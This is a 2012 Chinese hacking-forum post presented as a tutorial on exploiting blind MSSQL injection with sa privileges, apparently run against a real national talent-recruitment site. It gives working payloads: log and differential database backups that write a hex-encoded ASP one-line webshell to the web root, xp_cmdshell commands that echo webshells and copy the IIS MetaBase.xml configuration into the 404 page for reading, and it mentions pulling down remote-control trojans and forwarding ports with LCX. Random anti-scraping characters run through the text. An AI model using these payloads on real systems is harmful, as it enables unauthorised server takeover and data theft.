找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1996|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
+ F+ k: _( |$ I% ~! F
$ S- W" a( K+ \) ~
6 `" N' c" H: D6 q! Z                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
. c, x8 q# ?2 a7 l8 F$ B* L$ k, e+ K  T' I8 V' R
                                                                 
$ V- B7 s4 Z1 t) d6 E                                                                 0 k( y  w- A5 t' R" y1 x
                                                                  论坛: http://www.90team.net/
# ~& d2 S' c. |) x7 H5 {0 z) _5 F2 O- q! z2 c

+ f% }5 K* R# S5 d+ W) C
+ o" k/ h* N$ t( ]+ o友情检测国家人才网
7 X$ S7 W3 _- E- j! k4 W
/ D& ^; d; ^" P9 S: j! \3 m
: O8 E2 G+ |0 N) K7 z  m内容:MSSQL注入SA权限不显错模式下的入侵8 v  p% D- o' `

1 _. e8 b0 W: b" D( n# \( n3 l
; ~* T3 G( c  W9 S/ d一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。* L& b- k* f- H

, e9 @; U( M0 p( W9 e我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。* [6 ?. W1 U+ H7 c
# p( e- _6 o/ w( O' \
  G/ m" j: n6 l1 G( [, P7 |/ e
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
' R2 \% h6 f$ t
: C3 i$ c9 j1 W) x4 l思路:
2 y! L& L" D, S0 Z7 I# O+ \
# k* b$ v7 T; B0 F( X7 l首先:
- C- T) ?1 X9 m9 |9 o4 b+ u! E; n4 ]
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。1 m+ D' O6 Z% g
, ^- x( k8 c0 `. n3 a
1.日志备份获得Webshell; @* U% h  C; ~3 x! n, S9 w
6 ^: S3 n1 v8 s6 }$ v
2.数据库差异备份获得Webshell4 A! p6 t7 T& e0 T9 E8 R% q. S# Z
' }& ]+ k5 i2 u3 F6 j: L. Z; r
4.直接下载免杀远控木马。7 A: \9 P0 ^4 u* b& U2 f
1 h* D0 p$ K5 Q$ ]5 h0 _( H
5.直接下载LCX将服务器端口转发出来
; L- q7 f9 i# b" i5 `: q$ v* [) H4 a& G0 X6 \9 C1 K# q% I' i
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。3 [4 T( u& c+ }7 Q4 [
( M! R$ @5 I# L8 m% ^( x9 A

" D; K: O3 U. r/ K5 V9 Y1 \" [
) t2 T* v/ |% V% ]7 \0 g在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
: `/ ?) ], t' w6 Q
* D# y% P( _1 H  e我直接演示后面一个方法
) A/ |' |( Q7 O/ T& d
, n( p/ E7 e+ F( @, g7 E8 y3 X! E0 A- ]
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
0 C5 i9 X$ n2 T5 M  I( Q2 {7 ~' j. w2 d. R& x: }$ i8 M* q
4 v6 c  n; c9 D* o+ Y

( C- @" h1 j4 ^# w3 q& M& r- w, c
◆日志备份:0 Y1 J$ h2 ]. Y, Z# [

; T+ [  a& \) ^2 g/ K# Z# W7 Y% d4 g& \) A' b2 |
1. 进行初始备份
0 E& g" _/ \' r; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--8 M: M& v0 R' Z7 C

4 ~% R9 n- d1 z/ W  p' [2. 插入数据( {7 l; Q' e2 E& C
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--$ X" @& p- p6 |0 @, P; g

) h0 N; a0 r, w) ?' Q9 _. S: Y0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
3 W( i2 U$ R: p8 i  
( {3 k5 j2 U# V! q3. 备份并获得文件,删除临时表' F2 v- `3 m9 z. s& }9 A
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
- Q) ?# e6 `# M! w. z) g' u
( `+ L- v2 W% K" f+ x  T7 O' Y6 D* r" \3 i) d

, {. n( v4 U0 s% l. l. J3 N# |* i◆数据库差异备份' @2 [4 C9 u  ]6 o

. P9 g$ g! T2 @* ]7 i(1. 进行差异备份准备工作9 O0 w! `0 Q" b
  [9 @' g9 m7 s" T# P& F- N! ]! C
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
: _7 k8 ~# v& a
  n7 v! @; x# P. t. ~* f上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
- C2 ^- Q: F$ A8 E& n' J! ~
5 l) g. L3 G; K  O/ k: n; [* ?3 B. ?; g/ ^% w; [0 ]0 o4 U" l
(2. 将数据写入到数据库/ `3 g' g% _/ s4 |& h& H8 [! |
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 2 Z. k: h/ A7 j- H) E! @4 h

/ P" Y) b. A5 E  g9 g& C+ }0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>* H1 d( a) S+ F& W+ n& t* R
! w/ k7 S" l# _# P
3. 备份数据库并清理临时文件, Y, I6 k1 Y# R6 i* G% o8 r/ u

, E5 O7 [  K( k;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--+ T; v  w$ B- q

2 K# L3 n. O) ?: F8 g. q0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 & k, _4 D3 \% i3 }+ j8 X
: i% _( B& A  K8 {3 Q2 m0 W4 a! X
: s. g4 Q$ D' \0 I+ O
" x% i& d5 j1 {3 ?0 \5 S3 Z
用^转义字符来写ASP(一句话木马)文件的方法:   8 L7 u! f; O% X* r! o: d
% `" S% r0 a3 S4 x# E, H8 m& F+ S% J
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
. ^6 B- A4 f) e* D" X9 \
: e6 p9 i5 X1 M7 j$ t5 f2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
( G! k; F, H! s" X/ Y, }9 H/ Y0 T1 P; w: I# j0 E3 q
读取IIS配置信息获取web路径5 I5 j* p! i8 M6 u, B

( `- ?  e1 A" ?* e/ H" w     9 ]5 K% j7 p4 \0 c0 w
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--" ?+ Y) {+ H, o# f( U) _6 R
; j* u8 h& \( q$ d& C( t
执行命令
% `- V/ z( [: ], H     ( i- J; ?+ W6 x( b/ t& u
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--1 v& w+ W+ b" \% d) o

! q7 z/ r5 a. c& P: x' h- A% `1 f* s- u8 w
$ k# |6 y# B9 C4 u  b
) t; ~; h5 Y4 L; x# R2 n/ @

! H6 B. E% U: k  K1 Y5 e
- @" p6 V, T8 g- f1 R" O( j& B
% P: {2 \( l/ ~7 R/ Q. j' y+ w( B5 r3 _1 S

. ~% R2 T! K/ n) ]+ _3 I
0 `3 U9 e( F- g0 r6 G$ d' }; V2 a; _" b, j2 _0 Z; d2 W& }: \6 ?
/ V8 u" e1 d* v! G# t8 f
1 E2 F, @0 J. K! d  V; P

- a, ~7 l  `0 j8 g: ?3 j
4 ^4 D; S+ z) n/ ]8 m$ T2 @# s! q4 z

7 w8 H& n. Z- c6 e2 f: L* Z' \1 x: L% u  _4 E

* S8 `: X8 H: r; M, i9 ?1 G5 {8 v1 c# ]
# R& k  O1 d  }6 r

9 u( S8 A" U) H7 o- `7 O( ~+ n
& D( ^, j" k( G' H8 t8 j& P$ z, `9 p+ U% V. k. a1 O

4 H% \1 s; q0 x- g4 a9 N% y" A: M, x/ }$ p- o) G% ]* g* E( s7 Q

  a) ^* @  e. f) f: i" \; d* Z
# ~' L/ I1 d1 @$ K4 h4 A7 \1 P+ z4 W4 s0 `
2 D' s- M, l  ~2 E3 ]# U8 d1 m! V" a
" N" H+ B9 S' u* Q

) N9 x) x6 Y7 \: Z7 N
8 N, U  p3 `: m9 t; L0 W* j% V8 n: O
& h& W0 {$ p3 S% F; A$ ^
8 F+ M& \7 P9 R6 U: N. z: R8 D$ B( n1 T5 q

' p) k. x; ]0 y- a$ V
4 b# i+ @2 o2 q5 `" k
. p, G. s2 O' l; x/ P* g; c3 v. m* H
1 f% S* ]9 f, Y* k$ @

5 M( k; A9 U" O" ^3 I/ w) q" Y$ z+ c6 Y1 V' U4 b
$ B+ }* j7 T; J. r

5 w; j3 s( \+ W# f( A3 W1 x( n! S% k& G0 S5 a

7 U& J: `9 z4 p) m; Z+ j# s
  ^; \9 h6 _( s6 f# M* S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表